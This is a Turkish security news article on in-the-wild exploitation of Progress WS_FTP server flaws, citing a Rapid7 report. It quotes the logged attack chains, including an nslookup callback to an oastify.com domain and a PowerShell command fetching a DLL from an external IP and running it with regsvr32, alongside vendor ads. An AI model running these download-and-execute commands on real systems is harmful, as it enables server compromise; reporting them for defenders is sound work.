Daha önce bildirildiği gibi, Progress’e ait WS_FTP’de, siteler arası komut dosyası çalıştırma (XSS), SQL enjeksiyonu, siteler arası istek sahteciliği, kimliği doğrulanmamış kullanıcı numaralandırma ve diğer birkaç güvenlik açığıyla ilişkili birden fazla güvenlik açığı keşfedildi.
Progress, kullanıcılarını WS_FTP güvenlik açıkları konusunda uyardı ve WS_FTP sunucusunun sabit sürümünden bahseden bir güvenlik tavsiyesi yayınladı. Ayrıca kullanıcılarından en son sürüme geçmelerini de talep ettiler.
Doğada İstismar Edilen Güvenlik Açıkları
Cyber Security News ile paylaşılan raporlara göre, bu güvenlik açıklarının ortadaki tehdit aktörleri tarafından istismar edildiği ortaya çıktı. Daha fazla araştırma yapıldığında, istismar yürütme zincirinin gözlemlenen tüm örneklerde aynı olduğu bulundu.
Yapay Zeka Destekli E-posta güvenlik çözümlerini uygulamak “Trustifi”, işletmenizi E-posta İzleme, Engelleme, Değiştirme, Kimlik Avı, Hesabın Devralınması, İş E-postasının Tehlikeye Atılması, Kötü Amaçlı Yazılım ve Fidye Yazılımı gibi günümüzün en tehlikeli e-posta tehditlerine karşı koruyabilir
Ücretsiz demo
Bunun, savunmasız WS_FTP sunucularının kitlesel olarak istismar edildiği anlamına gelebileceğinden de bahsedildi. Toplanan günlükler ayrıca kaydedilen tüm olaylara ilişkin belirli bir geğirme paketi alanından oluşuyordu; bu da toplu istismarı tek bir tehdit aktörünün gerçekleştirdiği anlamına geliyor.
Ancak komutların tüm yürütme zinciri aşağıda listelenmiştir.
Büyük-büyük-büyük-büyükbaba Süreci:
| C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipm18823d36-4194-409a-805b-cea0f4389a0c -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0 |
Büyükbaba veya Büyükbaba Süreci:
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe” /noconfig /fullpaths @”C:\Windows\Microsoft.NET\Framework\v4.0.30319\Geçici ASP.NET Dosyaları\aht\e514712b\ a2ab2de1\ryvjavth.cmdline |
Ana Süreç:
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Windows\TEMP\RES6C8F.tmp” “c:\Windows\Microsoft.NET \Framework\v4.0.30319\Geçici ASP.NET Dosyaları\aht\e514712b\a2ab2de1\CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP |
Çocuk Süreci:
| C:\Windows\System32\cmd.exe” /c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com |
Raporlara göre Saldırı zincirinde aşağıdaki komut uygulamaları vardı.
Büyük-büyük-büyük-büyükbaba Süreci:
| C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0 |
Büyükbaba veya Büyükbaba Süreci:
| C:\Windows\System32\cmd.exe” /c powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll |
Ana Süreç:
| powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll |
Çocuk Süreci:
| C:\Windows\System32\cmd.exe” /c regsvr32 c:\users\public\NTUSER.dll |
Ayrıca Rapid7 tarafından kaydedilen olaylar, azaltımlar ve diğer bilgiler hakkında ayrıntılı bilgi sağlayan eksiksiz bir rapor yayımlandı.
850’den fazla üçüncü taraf uygulamaya hızla yama uygulamak için Patch Manager Plus’ı kullanarak kendinizi güvenlik açıklarından koruyun. Avantajlardan yararlanın ücretsiz deneme % 100 güvenlik sağlamak için.